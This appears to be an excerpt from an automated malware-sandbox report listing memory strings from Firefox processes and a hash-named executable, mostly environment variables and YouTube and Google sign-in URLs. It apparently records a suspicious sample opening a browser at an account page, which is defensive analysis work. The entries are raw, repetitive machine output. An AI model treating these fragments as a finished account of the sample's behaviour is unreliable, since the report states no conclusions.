Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsz[ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2790450714.00000291F3C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCS equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-i equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2790450714.00000291F3C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account9 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: accounts.google.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr	String found in binary or memory: accounts.google.comwww.youtube.com"- equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr	String found in binary or memory: ahttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: h3realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-i equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3223621375.0000016DEE3D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I77EVwBCWklE9qIBneDMIiwFWCCFTErG2FyxHopmLBm9ld0zmag6hfnN6yKuG81xlYfRS6YoZQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1379105066%3A1722017451321129&ddm=0 equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0 equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr	String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/favicons/facebook-com.icohttps://www.aliexpress.com/nimbus-desktop-experimentsimages/leboncoin-fr@2x.png_generateVariablesOnlySchemafavicons/leboncoin-fr.pngimages/aliexpress-com@2x.pngoptInToExperiment/branch<_validateBranches/schema<nimbus:enrollments-updated did not match due to targetingmain/nimbus-desktop-experiments equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2883300923.0000016DDF28C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ee7a49fbf0.exe, 00000018.00000003.2729921737.0000000002517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https:www.youtube.com:443:www.youtube.com:443::n:1724609447:h3:y:1722017420:n:^partitionKey=%28https%2Cyoutube.com%29:\|n:y: equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr	String found in binary or memory: mhttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla FirjZ equals www.youtube.com (Youtube)
